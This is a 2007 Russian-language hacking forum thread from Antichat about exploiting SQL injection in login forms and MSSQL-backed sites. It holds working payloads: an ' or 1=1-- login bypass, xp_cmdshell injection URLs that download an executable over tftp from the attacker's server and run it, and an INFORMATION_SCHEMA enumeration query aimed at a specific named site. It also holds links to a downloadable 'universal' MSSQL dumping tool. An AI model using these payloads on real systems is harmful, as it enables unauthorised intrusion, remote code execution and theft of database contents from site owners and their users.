Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

05.07.2007, 13:53
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
ява фильтрация обходитьсся на уровне посылки пакета.
Если нету ошибки то с чего ты взял что есть иньекция.
' or 1=1--
Придает иситаное значение передаваемому запросу так что или ты авторизуешься или нет.
|
|
|

05.07.2007, 14:33
|
|
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме: 561037
Репутация:
73
|
|
Сообщение от [ cash ]
ява фильтрация обходитьсся на уровне посылки пакета.
а если просто сохранить страничку и вырезать с неё ява скрипт блок, а потом просто запустить этот сохранённый фалик? Думаю так проще.
Сообщение от [ cash ]
Если нету ошибки то с чего ты взял что есть иньекция.
дак в том, то и прикол, что нет ошибок и инъекции соответственно тоже, именно поэтому спрашивал может есть ещё какие-либо приёмы, кроме уже описанных
Сообщение от [ cash ]
' or 1=1--
Придает иситаное значение передаваемому запросу так что или ты авторизуешься или нет.
у меня обычно такие запросы приводили не к авторизации, а просто к ошибке.
|
|
|

05.07.2007, 14:45
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
а если просто сохранить страничку и вырезать с неё ява скрипт блок, а потом просто запустить этот сохранённый фалик? Думаю так проще.
Просто перехватить пакет исправить данные и отправить дальше.
у меня обычно такие запросы приводили не к авторизации, а просто к ошибке.
Нет универсального способа.
|
|
|

05.07.2007, 15:39
|
|
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме: 561037
Репутация:
73
|
|
Сообщение от [ cash ]
Просто перехватить пакет исправить данные и отправить дальше.
этож нада знать как перехватывать, исправлять и передавать дальше
А всё таки не подскажешь, может известы ещё пару примеров, что можно втулить в форму авторизации?
|
|
|
Выполнение системных команд через Sql запрос |

09.07.2007, 13:38
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме: 3025546
Репутация:
1327
|
|
Выполнение системных команд через Sql запрос
Тема которую почти никогда не затрагивают в статьях про MSSQL сервер от Microsoft.
При наличии соответствующих прав, хакер может выполнить произвольную команду.
Вот пример:
Код:
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'dir'--
Выводим список файлов и под-папок из текущей папки
Также можно залить любой файл на уязвимый сервер
Код:
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'tftp –i 127.0.0.1 get file.exe'--
127.0.0.1 - это сервер на котором лежит наш file.exe
и выполнить его
Код:
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'file.exe'--
Последний раз редактировалось _Pantera_; 09.07.2007 в 13:57..
|
|
|

09.07.2007, 13:43
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'dir'
Че куда ты выведешь???
Запрос прервать коментариями не надо...
Короче почитал поржал...
|
|
|

15.07.2007, 19:23
|
|
Banned
Регистрация: 02.06.2007
Сообщений: 42
Провел на форуме: 263861
Репутация:
6
|
|
почему при выполнении подзапроса
(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.T ABLES)
пишет ошибку
Incorrect syntax near the keyword 'top'.
в данном случае сайт
http://info.l2r.ru/?part=items&id=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FR OM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='ta ble_name'+AND+COLUMN_NAME+NOT+IN+('column'))--
|
|
|

23.07.2007, 14:28
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
UPDATE!
Уневальсальный дампер для mssql через иньекцию.
http://slil.ru/24655320
http://www.rapidshare.ru/350872
Видео тут.
Собсвенно продолжение статьи и то о чем все просили.
http://hack-shop.org.ru/mssql.php
Последний раз редактировалось [ cash ]; 09.09.2007 в 23:08..
|
|
|

08.08.2007, 00:13
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
UPDATE!
Официальный хелп от майкрософт по ADO (Jet Database). На русском.
http://support.microsoft.com/ph/1596
|
|
|

14.08.2007, 12:40
|
|
Новичок
Регистрация: 08.08.2007
Сообщений: 2
Провел на форуме: 8244
Репутация:
0
|
|
А что делать если фильтрируюеться знак ( ' ) , а когда вожу запрос через char() выдает ошибку 'The char function requires 1 arguments' ??
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|